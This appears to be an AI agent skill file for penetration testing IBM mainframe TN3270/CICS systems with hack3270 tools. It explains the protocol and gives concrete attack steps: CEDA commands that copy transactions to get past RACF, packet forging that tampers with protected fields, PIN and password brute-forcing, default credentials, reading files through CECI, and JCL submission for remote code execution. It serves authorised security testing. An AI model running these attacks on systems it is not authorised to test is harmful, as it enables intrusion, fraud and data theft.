AgentSkillsCN

tn3270-pentest

通过 hack3270 对大型机 TN3270/CICS 进行渗透测试。适用于与 IBM 大型机、3270 终端仿真器、CICS/KICKS 应用程序、TSO、VTAM、MVS、z/OS 等系统交互时使用,或在对大型机系统进行渗透测试时使用。涵盖协议细节、屏幕解析、数据包构造、隐藏字段检测、受保护字段篡改、事务枚举、RACF 绕过以及常见攻击模式。

SKILL.md
--- frontmatter
name: tn3270-pentest
description: Mainframe TN3270/CICS penetration testing via hack3270. Use when interacting with IBM mainframes, 3270 terminal emulators, CICS/KICKS applications, TSO, VTAM, MVS, z/OS, or when pen testing mainframe systems. Covers protocol details, screen parsing, packet construction, hidden field detection, protected field tampering, transaction enumeration, RACF bypass, and common attack patterns.

TN3270 Mainframe Penetration Testing

TN3270 Protocol Essentials

Unformatted vs Formatted Screens

Sending the wrong packet format causes APCT abends. This distinction is critical.

Unformatted (after CLEAR, or blank screen with no fields):

code
AID + cursor_addr(2 bytes) + EBCDIC_data + IAC_EOR

DO NOT include SBA (0x11) on unformatted screens. There are no fields, so SBA corrupts the transaction name and causes APCT abends.

Formatted (has input/protected fields):

code
AID + cursor_addr + [SBA + field_addr + data]... + IAC_EOR

Use analyze_screen_fields() to discover field addresses first.

Key 3270 Orders

ByteOrderPurpose
0x11SBASet Buffer Address
0x1DSFStart Field (attributes)
0x29SFEStart Field Extended (hidden fields use this)
0x3CRARepeat to Address
0x13ICInsert Cursor

Screen: 24x80 = 1920 positions. Position = row*80 + col (0-indexed). Addresses are 12-bit encoded into 2 bytes.

AID Keys

HexKeyHexKey
0x7DENTER0x6DCLEAR
0xF1-0xFCPF1-120xC1-0xCCPF13-24
0x6CPA10x6EPA2
0x6BPA30xF0SYSREQ

All text is EBCDIC-encoded on the wire. Use convert_ascii_to_ebcdic().

Mainframe Access Layers

Layer 1: VTAM / Network

Before reaching CICS, you traverse VTAM (Virtual Telecommunications Access Method).

  • APPLID enumeration: Discover CICS region names via LOGON APPLID(name). Common APPLIDs: CICS, CICSPROD, CICSTS51, DBDCCICS. Use NMAP vtam-enum or brute-force with send_command("LOGON APPLID(name)").
  • USSTAB screens: Custom logon screens defined by USS tables. May display banner info, version numbers, or region names.
  • Multiple CICS regions: Production systems often have multiple CICS regions (dev/test/prod). Always enumerate all APPLIDs.

Layer 2: TSO / ISPF

For MVS/z/OS systems, you may first land at TSO:

  1. At TSO Logon prompt: LOGON userid or type userid into field
  2. Enter password at password prompt
  3. After login: CICS may auto-start, or issue CLEAR + transaction code

Layer 3: CICS Application

Standard CICS entry: CLEAR then type 4-character transaction code (no SBA).

CICS System Transactions (High-Value Targets)

These IBM-supplied transactions are present in every CICS region. Access to ANY of these is a significant finding.

TransactionPurposeAttack Value
CESNSign-on (authentication)Default creds, brute force
CESFSign-offSession termination
CEMTMaster terminal (admin)System enumeration, config changes
CEDAResource definitionDefine new transactions, RACF bypass
CECICommand interpreterExecute arbitrary EXEC CICS commands
CEDFExecution debuggerStep through programs, inspect data
CEBRQueue browserRead temporary storage queues
CSGMGood morning (splash)Version info disclosure

CEMT Exploitation

If CEMT is accessible, use it for reconnaissance:

  • CEMT I TASK -- list active tasks and userids
  • CEMT I TRAN(*) -- enumerate ALL defined transactions
  • CEMT I FILE(*) -- list all VSAM files
  • CEMT I PROG(*) -- list all installed programs
  • CEMT I TERM(*) -- list terminals with session info
  • CEMT I SYSTEM -- CICS version, region info
  • CEMT SET TRAN(xxxx) ENA -- enable a disabled transaction
  • CEMT SET FILE(xxxx) OPE REA -- open a file for reading

CEDA RACF Bypass

If CEDA is accessible but CEMT/CECI are RACF-protected, use CEDA to copy restricted transactions to new names that bypass RACF:

code
CEDA COPY TRAN(CEMT) AS(XEMT) GROUP(DFHLIST)
CEDA COPY TRAN(CECI) AS(XECI) GROUP(DFHLIST)
CEDA INSTALL TRAN(XEMT) GROUP(DFHLIST)

The copies (XEMT, XECI) may not have RACF rules and are freely accessible.

CECI Command Execution

CECI is the most dangerous transaction -- it executes arbitrary EXEC CICS commands:

  • CECI READ FILE(filename) RIDFLD(key) -- read VSAM file records
  • CECI WRITEQ TS QUEUE(name) FROM(data) -- write to temp storage
  • CECI LINK PROGRAM(progname) -- call any installed program
  • CECI SPOOLOPEN -- access JES spool for JCL submission
  • CECI SEND TEXT FROM('data') -- send data to terminal

CEBR Queue Reading

Browse temporary storage queues for sensitive data:

  • CEBR queuename -- read queue contents
  • Queues may contain: session tokens, debugging data, application state, credentials

Attack Patterns

1. Hidden Fields (Every Screen)

CICS applications hide fields using SFE with non-display attribute. Always run analyze_hidden() on every screen.

Common findings:

  • Hidden menu options with real functionality
  • Status flags controlling business logic (e.g., "Purchaseable: Y/N")
  • Internal IDs, debug data, authorization tokens

Hiding is not access control. If the server doesn't validate separately, hidden values can be submitted by anyone.

2. Protected Field Tampering (Critical)

The terminal prevents typing in protected fields, but send_raw_hex() bypasses this entirely. COBOL's RECEIVE MAP reads ALL fields from the input stream including protected ones.

Attack: Modify prices, quantities, account numbers, or status codes in protected fields:

code
AID + cursor_addr
+ SBA + protected_field_addr + tampered_EBCDIC_data
+ SBA + input_field_addr + legitimate_data
+ IAC_EOR

Use analyze_screen_fields() to find protected fields with financial data, then encode_buffer_address() and convert_ascii_to_ebcdic() to build the raw packet.

3. Transaction Enumeration

Discover all defined transactions, not just what menus show:

  • CEMT: CEMT I TRAN(*) lists all transactions if accessible
  • Pattern guessing: Applications use prefixes (e.g., MC** for "Mels Cargo", AP** for "Accounts Payable")
  • Wordlists: Use fuzz_transaction_codes() with cics-default-transactions.txt
  • Config files: CICS PCT (Program Control Table) or CSD defines all transactions. KICKS uses KIKPCT.
  • Direct access: Transactions can be invoked directly via CLEAR + code, bypassing menu-level access controls

4. Default Credentials & Users

DefaultNotes
CICSUSER / CICSUSERCommon default CICS region userid
No external securitySome regions run WITHOUT RACF/ACF2/TopSecret -- every user has region-level access
Preset terminal securityTerminals may be pre-signed-on as a default user
CESN with blank passwordSome configurations allow sign-on without password

Always check: CEMT I SYSTEM for security manager status. If CICS reports no external security, all users have full region ID authority.

5. Brute Force

Use setup_injection() + brute_force_field():

  • PINs/supervisor codes: numeric-4.txt (10K entries), pin-common.txt
  • Passwords: default-passwords.txt
  • Userids: common-userids.txt
  • Set fail_pattern to the error message text

6. AID Key Scanning (Including PA Keys!)

AID keys are handled by COBOL programs, not CICS. Any AID key can trigger hidden functions. Use scan_aid_keys() on every major screen, but also manually test PA1, PA2, and PA3 -- these are often missed by automated scanners.

Critical: Do NOT skip PA keys. In real-world testing, PA3 on a main menu was found to silently navigate to a hidden/secret transaction, and PA1 on that secret screen revealed a nested easter egg. PA keys are dangerous because:

  • They only transmit the AID byte (no field data), making them invisible to field-level monitoring
  • Most users never press PA keys, so developers use them as "hidden" shortcuts
  • COBOL programs handle them via WHEN DFHPA1 / WHEN DFHPA2 / WHEN DFHPA3 in EVALUATE EIBAID
  • They may serve as backdoors to admin screens, debug modes, or privileged functions

Watch for:

  • PA keys (PA1-PA3): Hidden navigation, backdoor access, easter eggs, debug screens
  • Undocumented admin screens on unusual PF keys (PF13-24)
  • Deceptive key labels (PF3 labeled "Quit" but does something else)
  • CLEAR key intercepted by COBOL (doesn't exit, just redisplays -- could also navigate)
  • SYSREQ key behavior
  • Nested hidden AIDs: After discovering a hidden screen, scan ALL keys on THAT screen too

Testing approach: The scan_aid_keys() tool may fail to properly test keys after PF3 (Quit) exits the application, since subsequent keys are sent to a blank CICS screen instead. Manually test keys on each screen to ensure accuracy, or exclude PF3 from automated scans and test it separately.

7. File Access via CECI

If CECI is available, read application files:

  • CECI STARTBR FILE(name) RIDFLD(*) -- start browsing a file
  • CECI READNEXT FILE(name) -- read records sequentially
  • Files may contain: customer data, credentials, configuration, audit logs

Use CEMT I FILE(*) first to enumerate available files.

8. JCL Submission (Remote Code Execution)

If spool access is available via CECI, submit JCL for system-level access:

  • SPOOLOPEN/SPOOLWRITE: Write JCL to JES spool
  • TDQueue: Write JCL to transient data queue (CXRA) for execution
  • Payloads: reverse shells (TSO/REXX/Unix), FTP commands, custom JCL

This escalates from CICS application access to z/OS system access.

9. SURROGAT / User Impersonation

The SURROGAT resource class controls whether users can submit jobs as other userids. Check:

  • CECI SPOOLOPEN with a different userid
  • If SURROGAT checks are not enforced, you can impersonate privileged users

10. Information Disclosure

Look for leaked information on every screen:

  • CICS version numbers (CSGM splash screen, CEMT I SYSTEM)
  • z/OS version, LPAR name, SYSPLEX info
  • Userid display in headers/footers
  • File HLQ (High-Level Qualifier) paths revealing dataset naming conventions
  • Library paths exposing CICS installation directories

Abend Codes

CodeMeaningSeverity
APCTProgram not found/disabledLow
ASRAProgram check (crash)Critical
AICARunaway taskCritical
AEY7TimeoutMedium
SOC7/S0C7Data exception (bad decimal)Critical
SOC4/S0C4Protection exception (memory)Critical
ASRBOperating system abendCritical
AEIPInvalid EXEC CICS commandLow
AKCSStorage violationCritical

Any ASRA, SOC7, SOC4, or AKCS during testing indicates the application doesn't validate input -- a critical finding.

Pen Test Methodology

  1. Enumerate VTAM APPLIDs -- discover all CICS regions
  2. Check system transactions -- try CESN, CEMT, CEDA, CECI, CEDF, CEBR
  3. Check security manager -- is RACF/ACF2/TopSecret active? (CEMT I SYSTEM)
  4. Enumerate transactions -- CEMT I TRAN(*) or fuzz_transaction_codes()
  5. Navigate all screens -- record every transaction code (top-left of screen)
  6. Check hidden fields -- analyze_hidden() on every screen
  7. Test protected field tampering -- prices, quantities, status codes via send_raw_hex()
  8. Test hidden options -- enter discovered hidden values into input fields
  9. Direct transaction access -- bypass menus by invoking transaction codes directly
  10. Brute force PINs/codes -- setup_injection() + brute_force_field()
  11. Scan AID keys -- scan_aid_keys() on each major screen, plus manual PA1/PA2/PA3 and CLEAR tests on every screen (scan tools may miss these)
  12. Fuzz inputs -- fuzz_all_input_fields() for crashes/abends
  13. Check authorization -- do destructive actions require auth/confirmation?
  14. Attempt file access -- CECI READ FILE() if available
  15. Check JCL submission -- spool/TDQueue access for RCE
  16. Examine traffic -- load session DB, compare packets, look for anomalies

hack3270 MCP Tools Quick Reference

Connection: connect_api, reconnect_api, ping, check_connection Screen: get_screen, get_screen_raw, get_screen_raw_hex, find_text, get_text_at Fields: analyze_screen_fields, get_input_fields, get_hidden_fields, analyze_hidden Send: send_enter, send_clear, send_aid_key, send_pf_key, send_command, send_field_data, send_raw_hex, build_and_send_packet Attack: fuzz_field, fuzz_all_input_fields, fuzz_transaction_codes, brute_force_field, scan_aid_keys, setup_injection, inject_value Session DB: load_database, get_logs, get_log_entry, replay_client_data, replay_sequence Utility: convert_ascii_to_ebcdic, convert_ebcdic_to_ascii, encode_buffer_address, decode_buffer_address, check_abend, wait_for_text, wait_for_screen_change